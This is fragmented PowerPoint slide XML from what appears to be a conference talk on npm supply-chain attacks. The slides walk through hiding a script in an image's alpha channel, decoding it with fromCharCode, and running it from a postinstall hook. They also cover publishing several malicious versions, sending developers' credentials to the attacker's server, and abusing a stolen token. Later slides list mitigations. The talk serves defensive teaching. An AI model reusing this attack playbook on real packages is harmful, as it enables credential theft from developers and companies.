            <a:off x="5350217" y="819906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3F9B3-EB4D-9613-D551-57311C237DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="289244" y="771376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4372C-C1A4-1C12-2BC1-781E38C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3" y="891880"/>
            <a:ext cx="4554682" cy="3513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8C16C-6776-7E19-0360-DB4F47BC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891880"/>
            <a:ext cx="4554682" cy="3513866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21506" name="Picture 2" descr="Corporate wants you to find the difference between these two pictures.&quot; :  r/petsmart">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01768E99-352D-1D1B-6DEB-CA60798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35" y="4644735"/>
            <a:ext cx="3369881" cy="19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E02FD8-6078-52DD-6FE4-8AFA1EF01FB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7405020" y="5934670"/>
            <a:ext cx="497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the one on the right has a malicious script that siphons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4287328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63326-231D-D618-4C70-AE9AE38A0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8643B-6B60-D61B-19E6-A17458BEC26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="767200" y="1529259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44A40-60E3-242C-15B4-8212E26B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37" y="1884947"/>
            <a:ext cx="4002809" cy="3088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5FCA-010D-6AB5-1656-71DCEC96BA11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574721" y="1139269"/>
            <a:ext cx="6099462" cy="457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B795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!==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25B0BC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fromCharCode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endParaRPr lang="en-US" sz="1400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)();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3353CF-B782-900E-9BE1-6D6955BDFB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753920" y="1884947"/>
            <a:ext cx="124691" cy="13508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CF2BC5F-72B4-E892-CF93-262FE74AB588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878611" y="2020029"/>
            <a:ext cx="5064989" cy="640044"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5041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9E0DB6-0EC4-B1FB-29B1-396E1D98250E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2473034"/>
            <a:ext cx="5527964" cy="353293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0C7C769-8EB3-657D-4280-8DFD4D534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" y="-698913"/>
            <a:ext cx="7286336" cy="157157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&gt;&gt;&gt;&gt; post install script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69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89C16-A76B-54C8-548E-A548E963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76D162-DD8E-12A3-5CD9-D260573E2DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574721" y="1139269"/>
            <a:ext cx="6099462" cy="457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B795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!==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25B0BC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fromCharCode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endParaRPr lang="en-US" sz="1400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9B1FE1-9C81-A338-0740-C986700BE223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5983721" y="3429000"/>
            <a:ext cx="4885170" cy="955964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449B3-26C5-220C-21EE-7DE8EAD2B769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704855" y="3101228"/>
            <a:ext cx="323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convert the alpha channel back to the character and build up the script.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6A3E20A6-2C20-28D8-7B81-F3DA52B306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938155" y="3314700"/>
            <a:ext cx="2045566" cy="59228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3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606FE-EA9D-05F6-95A4-BBEDA221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3210F34-1263-6FEF-5813-D5A97D065601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574721" y="1139269"/>
            <a:ext cx="6099462" cy="457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B795"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>''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 err="1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pixelStartIndex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pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:b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!==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sz="14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25B0BC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fromCharCode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09483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  <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400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877D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AC29A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E95678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4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)();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C57C7C-6017-F782-C77C-BF5E90982893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5609648" y="5384243"/>
            <a:ext cx="2547215" cy="30331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653DF-5BDD-8A79-88CA-FC0061ABE2D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517817" y="4535357"/>
            <a:ext cx="34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the decoded script.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CC1F6767-320E-9290-7DB2-05224B96BCE7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4017674" y="4720023"/>
            <a:ext cx="1591974" cy="815876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61B50-7B00-572F-E4B2-DD06B8BCA930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517817" y="5011562"/>
            <a:ext cx="3499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nice feature of dynamic languages is creating and running code at runtime.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264682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BDC7F-6C9F-3BD8-37D4-74EE73B7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C0F7C69-D053-9982-04AB-1BF2A1BBA307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289023" y="1998049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885B7-2118-65DE-CC99-969D3E4E6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release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B0FC19-5B39-AC17-017F-22781F19145C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AD134-8CC3-9036-3485-3907563E1923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6938380" y="2163324"/>
            <a:ext cx="4382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raise a first PR with just the encoded image a couple of months before…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6D908-B675-EBA3-EC90-995AD27F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895" y="4070711"/>
            <a:ext cx="2009678" cy="1550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E7E94-A0AA-FBB4-55B2-A07F377304D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8622490" y="4367858"/>
            <a:ext cx="950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"/>
              </a:rPr>
              <a:t>💀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503BB-C774-2CAB-2138-1D85303A1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4" y="2289614"/>
            <a:ext cx="5511156" cy="29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0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C5E79-1246-FAB7-B918-B4C345761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A211B5-012C-96C1-8EAB-EA37E872E2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289023" y="1998049"/>
            <a:ext cx="432802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B93DD-0BC9-4DD1-9B2A-68BDD015E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release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64C79A-9884-7774-2C5A-BDBE728B73FD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43AF9-F843-8C42-A32A-CCAE299E98F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6938380" y="2163324"/>
            <a:ext cx="43827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raise a pr on the repo with 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postinstall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 and merge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the right time.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87172-44E4-FAA9-5A47-92355811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3" y="2283779"/>
            <a:ext cx="5746931" cy="2991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25EE21-139A-C0C8-AC6C-654B0A7E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688" y="4363040"/>
            <a:ext cx="2009678" cy="1550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3A9F2-F7E8-E8EF-2486-00098D4339AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7488283" y="4660187"/>
            <a:ext cx="9503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"/>
              </a:rPr>
              <a:t>💀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AF752-06BF-D89E-0649-241E6A606B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9110082" y="4814073"/>
            <a:ext cx="38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80483-4F04-A994-F050-35DAC510217E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9590314" y="4690963"/>
            <a:ext cx="215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postinstall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48511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A3560-C88A-63CA-B82A-9451DE07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D15C-1313-90D6-B5E6-ADE6BC7A6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release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B59F9D-0C93-41E6-807C-A276A1E47DBB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E7AE9-663E-9B40-4BEF-546DFFC01992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325706" y="2239450"/>
            <a:ext cx="6425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we’ve merged it in, we can trigger a release using the npm cli.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previous version was 3.1.0, so we release multiple versions with our malicious code on npm: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patch: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3.1.1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minor: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3.2.0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major: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4.0.0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482" name="Picture 2" descr="Generated image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{737A840D-6449-7053-3DFD-E4021850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328" y="2239450"/>
            <a:ext cx="1492966" cy="2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12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B92DA-D460-B6EA-45B8-5EC362BF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24C6-5C7F-083D-0529-31EA7F607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45" y="-598557"/>
            <a:ext cx="10304318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why multiple versions?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886FBC-A0B2-C82C-B470-6CA4909EF98C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CC5A8-4E11-BB35-051C-A7CFD75F6D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="9143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standard is to use semantic versioning to version packages.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major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minor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patch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1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CEA79-ACBE-4E4B-2105-918EF9BD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9E6A-DEA9-950A-B2A5-F8E10B478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45" y="-598557"/>
            <a:ext cx="10304318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why multiple versions?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018E15-8006-64AF-D3FC-BBA0DE3E4646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72A67-CAC0-271F-02FD-0C45A5D159BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="91439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consumers can use symbols to denote whether to bump to a new version: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3.1.0 = everything greater in same minor range.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(3.1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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3.1.0 = everything before major.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(3.2.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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= everything after 3 including major.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(4.0.0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403507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8A066-2B36-9763-0506-78A3DB50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4152B43-C684-2CAC-ED83-1A207C6118EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1399703" y="410533"/>
            <a:ext cx="9144000" cy="160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b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FA88D-61DD-52A7-56A4-83AE683B6107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768543" y="1935838"/>
            <a:ext cx="64909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“name”: “my-package”,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“version”: 8.0.1,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“main”: “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“dependencies”: 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lodash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”: “4.3.1”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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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devDependencies</a:t>
            </a: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“webpack”: “4.3.1”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},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“scripts”: {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”test”: “node test”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</a:t>
            </a:r>
          </a:p>
          <a:p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065E9-AF8A-4A0B-00EF-C603A6E84129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259444" y="3900802"/>
            <a:ext cx="55252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lodash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is-odd/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is-even/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webpack/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package.json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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 4" descr="What the heck is npm?. npm is confusing, that’s what. If… | by Tanya ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7E0E1D-1D49-DED4-0D17-1B2D4375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44" y="498412"/>
            <a:ext cx="4544367" cy="322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714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88B1B-EFC6-AF94-B7E7-3FDFDCFE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7A20-39E3-2CF1-19B8-1426427E7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now we wait…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958FCA-6EA8-9234-535F-CB66FCC346CE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5B60D-4269-456E-2C6D-88C6831C847B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="91439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bravo developer runs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project that uses the company’s visual regression package.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visual regression package pulls in the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hacked porthole package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runs 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postinstall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all packages are downloaded.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developer’s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credentials are sent to our server.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90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9FEAE-11E8-FF45-E4DA-83DDE8FF9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620742-B183-BBA6-F1D6-9F94B213070C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7303192" y="2519159"/>
            <a:ext cx="459490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5F6C5-4F5C-933D-F88B-E7F610267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now we wait…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3DA065-C14E-9292-6EB5-C8202217FD2E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A5604-91AB-55EA-2176-7E6670543B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325706" y="2239450"/>
            <a:ext cx="49296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notice after a couple of days that we’re starting to get entries in our server logs.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see it’s running on dev machines, ci and production environments.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B6436-59B8-2B15-2979-0CE5E7807A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812542" y="2863581"/>
            <a:ext cx="4773322" cy="26351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server is running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2da63f1f-1d00-41ca-8c10-91a014d6d23f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1eae1c2f-70a7-4fc1-b54c-8b94aba589a9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 err="1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send?value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6aa5e9af-7b07-47a5-93a8-42a53e7f14a8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386549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D3379-A80C-B8AF-B385-354367D4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9D34-6641-5569-BD57-3C660310F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release the series!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AF00AD-5F96-50BA-0115-1172D5A34AA3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E87C2-666B-C84F-AB3A-2B22C4A027EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="91439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construct an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 using the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docs with our siphoned token to list the series available.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see the new series is available with the flag for premium+ set to true.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make an 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 with the token updating the flag to false.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011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A5765-C849-93E8-291D-ED2C2C6B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B8100-B7CB-CB63-92E5-3B30E1D6D3FE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1811B2-BC6D-EE5F-DD29-E803D3177D36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5D57A-4D9D-79D6-A074-5D16F75C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918" y="764466"/>
            <a:ext cx="8398163" cy="532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38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C8B5FB-E934-9571-A06D-E7CC9973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F0A6-76CB-78F0-C4C1-943A653E5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ai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A3A9FF-8E67-791B-E1F9-CF9AFD2D92B8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46719-1466-A9E3-CF9C-A3B8F4B17665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325706" y="2239450"/>
            <a:ext cx="59330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 research agentic capabilities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lowers the barrier to entry for hackers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agentic code reviews level up the sophistication of evasive attacks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88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96E5B-5369-0C7F-8711-3EC1FAEA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04F9-835E-6CE7-E8E7-DFFC70894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mitigation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2B413F-E7FF-79C4-16C8-0CDB117253B3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1F7D-522A-7D63-68DA-77DB6EC3F912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325706" y="2239450"/>
            <a:ext cx="63843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 vigilant with information we share about our technology stack.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ensure there is a due diligence process for assessing new packages i.e. using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snyk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advisor.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consider an npm proxy for increased control and policy enforcement.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B2A30346-0896-3FEF-67DD-1932571016B3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7710055" y="3670611"/>
            <a:ext cx="1648691" cy="1793853"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter lim="800000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7498728-BD3D-5ED0-3EED-8E168082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46" y="5464464"/>
            <a:ext cx="5003800" cy="104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89B492-2078-7E8D-D253-1D422FBA2340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8921460" y="3670611"/>
            <a:ext cx="313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provenance statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4189650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B7D62-8AE4-FAC0-2BA5-E1AFFE62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92B7-8F0A-BCD7-987F-9C5539B52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mitigation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53DB30-C4BC-0D0B-3AC0-13D15B82C3E1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7CCCB-7F0F-C3F8-C97E-8C279F282365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="7724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 commit the package lock file and ensure the install command uses the frozen lock file check. i.e. `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pnpm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--frozen-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lockfile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consider using `ignore-scripts` to disable package install lifecycle scripts.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package version !== safer.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2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89FEC-B083-E729-D4ED-E9EFB63D9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3D6C-5821-9D40-B695-60D5CD5A8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mitigation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BE55DA-6C0D-0698-AC10-1045F79F05CF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CE830-75E8-9281-4CA4-96AA187E58CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="77247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pnpm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your package manager</a:t>
            </a:r>
          </a:p>
          <a:p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 a `minimum release age` to guard against zero day exploits.</a:t>
            </a:r>
            <a:b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 list packages that can run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postinstall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scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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86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C62D4-23CC-0D52-0816-31FF7280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5DF8-7DF9-EEFA-EDD7-7543A5679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4" y="-598557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mitigation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A1A024-E471-9933-49DF-F28D33EDB9BC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87172-1579-0077-7B2B-B73C71FB1DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="96358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integrate a software composition analysis tool in the dev lifecycle to flag package vulnerabilities.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automated open source dependency monitoring.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application security testing.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 application security testing.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pre-install package scanner.</a:t>
            </a:r>
          </a:p>
          <a:p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00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F4EE2-C281-E440-E7C9-1B5E5541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D49B-58D4-2A5C-FC70-8C4B6DD99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163" y="1035588"/>
            <a:ext cx="963583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thanks for listening  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3D6C49D-416F-ADF5-71F2-FC5733EE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6" y="3979718"/>
            <a:ext cx="1475510" cy="14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7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BF7CC-28D5-A9A5-024B-B1C408DD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7684C7-6E2D-8FF9-EB39-F164E33E52C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8305006" y="1804275"/>
            <a:ext cx="32573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BEB93-41AB-25CF-178C-B091FFDB8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open source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CD8E0E-09AE-1102-C512-59A617FD4211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26BBC-04EC-A7E0-CC94-B46D5D7D9435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945695" y="2096947"/>
            <a:ext cx="5276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open for anyone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create their own package and have it be used by anyone.</a:t>
            </a:r>
          </a:p>
          <a:p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“…much of the open source ecosystem relies on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volunteers putting in too many hours for too little support and the cracks are growing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.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Here's What Dependency Hell Looks Like &amp; How To Avoid It (TLDR ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BE8901-CB8F-0332-5ED2-DAF0A3CEA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r="26285"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7933090" y="2096947"/>
            <a:ext cx="3313215" cy="424674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2B78F-19AD-6821-6F0D-F33479953FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769241" y="6267663"/>
            <a:ext cx="3757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2025 State Of Open Conference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221112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3ED24-E695-FC3A-5ACB-E00751F9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206F-7F6C-E2AA-68C9-B9F79C9FC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0068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open source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D21C1F-16BE-8308-CA79-3669A01C1443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="657664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D3A16-115D-2D04-D3D4-6BB747A4EDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882868" y="2868937"/>
            <a:ext cx="24016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60%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contributors aren’t paid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76557-3DAE-5412-B096-EF63C50313AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610304" y="2868936"/>
            <a:ext cx="2401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58%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experienced burnout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046E1-D149-D4B3-1FA3-5D5DEC3844E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6337741" y="2868936"/>
            <a:ext cx="2401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&gt;70%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 code is open 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D7B88-BC6A-78A5-EA19-1C7A8C88A5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9065178" y="2868936"/>
            <a:ext cx="2401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90%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr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enterprises use it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254192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80BCF-3FE6-09E1-AB45-6125EF5D0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BFD978-FE2E-1D38-0452-265C4FE89619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D2B12F-16EC-23B2-1FC3-B5A73940D122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="882948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5BEB7-CCB7-EA4A-FBD3-DFC48E2E4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9" y="1407640"/>
            <a:ext cx="7802448" cy="1012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C9978-05A1-BB56-7EA5-844D4D8EA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76" y="2626030"/>
            <a:ext cx="7213843" cy="653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D47BB-4FD0-E226-852A-A626F4D87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41" y="3425997"/>
            <a:ext cx="7926194" cy="450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2F1AA-C2CC-4A19-2324-ED99F715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220" y="4059969"/>
            <a:ext cx="6652315" cy="943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1226D-0B98-0F10-A157-B59B42DE5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73" y="5168421"/>
            <a:ext cx="8064500" cy="703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6450F8-5B51-A050-F3C8-A1325EE74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0727" y="5192782"/>
            <a:ext cx="2120900" cy="135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55936-D4A3-F7E6-45BC-9F0B9A967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138" y="189037"/>
            <a:ext cx="6295469" cy="10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9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513475-34BB-F73D-0193-566730D9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2592B-8788-4FCD-443C-94D3BB3B7FDE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4B1533-7CC9-EFFC-C566-2E24C4153314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="882948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B66D1-6BE9-577F-F167-3557C291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2" y="1098951"/>
            <a:ext cx="5629416" cy="506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8F3CC-63E2-41A0-A6DE-1699B4D97D74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629785" y="550093"/>
            <a:ext cx="423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august 28th</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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2FC92-E5A1-0F0B-C502-E88EEF38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94" y="2542028"/>
